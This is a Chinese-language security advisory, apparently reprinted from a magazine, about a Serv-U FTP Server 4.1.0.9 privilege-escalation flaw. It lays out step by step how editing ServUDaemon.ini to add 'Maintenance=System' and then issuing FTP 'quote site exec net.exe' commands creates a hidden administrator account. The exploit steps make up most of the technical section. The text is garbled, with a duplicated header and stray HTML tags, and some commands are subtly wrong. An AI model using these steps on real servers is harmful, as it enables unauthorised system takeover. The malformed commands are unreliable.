本地提升权限:是 远程提升权限:是 使用前提条件:对Serv-U配置文件有修改权限 声明:这只是一个提升权限的思路和方法,
ServU FTP Server远程/本地提升权限缺陷网络服务器
。 一、受影响的软件 Serv-UFTPServer4.1.0.9(以及以前所有版本) 二、受影响系统 Microsoft Windows Server2003所有版本 MicrosoftWindow本地提升权限:是 远程提升权限:是
使用前提条件:对Serv-U配置文件有修改权限
声明:这只是一个提升权限的思路和方法。
一、受影响的软件
Serv-U FTP Server 4.1.0.9 (以及以前所有版本)
二、受影响系统
MicrosoftWindowsServer 2003 所有版本
Microsoft WindowsXP所有版本
Microsoft Windows 2000 所有版本
Microsoft Windows NT 所有版本
三、综述
Serv-U FTP Server为RhinoSoft出品的一款Ftp Sserver软件,目前在全世界广为使用。经我研究发现,Serv-U FTP Server的配置文件存贮于Serv-U FTP Server文件目录下的ServUDaemon.ini文件中。如果本地受限用户或者远程拥有普通权限的攻击者能接触到该文件并精心构造ServUDaemon.ini文件中的内容就能利用Ftp进程在系统上以SYSTEM权限执行任意命令。
四、缺陷分析
Serv-U FTP Serve在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。包括用户的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U FTP Serve的文件目录,就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、本地系统上以FTP系统管理员权限来执行任意命令。并且不受系统版本的影响。(用户信息选择“存储与系统注册表中”不受此缺陷影响)
五、测试方法
1、本地测试
假设本地受限用户可以浏览Serv-U FTP Serve的文件目录。找到ServUDaemon.ini文件。用记事本打开原文件大致内容为:
<PRE>[GLOBAL]</p><p> Version=4.1.0.0 // Serv-U Ftp Server 版本号</p><p> ProcessID=584</p><p> RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/</PRE><PRE>AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB</p><p> [DOMAINS]</p><p> Domain1=127.0.0.1||21|127.0.0.1|1|0 //主机IP以及域名,端口情况</p><p> [Domain1]</p><p> User1=zihuan|1|0</p><p> [USER=zihuan|1]</p><p> Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6</p><p> HomeDir=c:\ // 可以浏览的目录</p><p> TimeOut=600</p><p> Access1=C:\|RWAMLCDP</PRE><PRE>如果把ServUDaemon.in文件修改为:</PRE><PRE>[GLOBAL]</p><p> Version=4.1.0.0</p><p> ProcessID=584</p><p> RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/</PRE><PRE>AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB</p><p> [DOMAINS]</p><p> Domain1=127.0.0.1||21|127.0.0.1|1|0</p><p> [Domain1]</p><p> User1=zihuan|1|0</p><p> [USER=zihuan|1]</p><p> Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6</p><p> HomeDir=c:\</p><p> TimeOut=600</p><p> Maintenance=System //权限类型</p><p> Access1=C:\|RWAMELCDP</PRE>以上内容比原内容多了一句“Maintenance=System”修改完成后保存,电脑资料
《ServU FTP Server远程/本地提升权限缺陷网络服务器》(https://www.unjs.com)。然后在用Ftp登陆到Serv-U FTP Server以后执行如下命令:<PRE>ftp>open ip</p><p> Connected to ip.</p><p> 220 Serv-U FTP Server v4.1.0.0 for WinSock ready...</p><p> User (ip:(none)): id //输入构造的用户</p><p> 331 User name okay, please send complete E-mail address as password.</p><p> Password:password //密码</p><p> 230 User logged in, proceed.</p><p> ftp>cd winnt //进入win2k的winnt目录,</p><p> 如果是winxp或者是<strong>windows</STRONG>server 2003就应该为windows目录。</p><p> 250 Directory changed to /WINNT</p><p> ftp>cd system32 //进入system32目录</p><p> 250 Directory changed to /WINNT/system32</p><p> ftp>quote site exec <strong>.net</STRONG>.exe user zihuan ziHUAN /add</PRE><PRE>//利用系统的net.exe文件加用户。</p><p> 200 EXEC command successful (TID=33).</p><p> ftp>quote site exec net.exe localhost administrators zihuan /add</PRE><PRE>//提升为超级用户</PRE>这样就在本地系统上加了一个为zihuan密码为:ziHUAN的超级用户。也可以直接用quote site exec net.exe localhost administrators user /add命令把当前用户提升到超级用户组中去。当然也可以在系统上执行任何命令。
声明:本文仅用来描述可能存在的安全问题,作者本人和 X档案杂志社不为此安全公告提供任何保证或承诺。由于传播、利用此文章提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。作者拥有对此安全公告的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者本人允许,不得任意修改或者增减此文章公告内容。
(责任编辑:铭铭 mingming_ky#126.com TEL:(010)-68476636)
原文转自:http://www.ltesting.net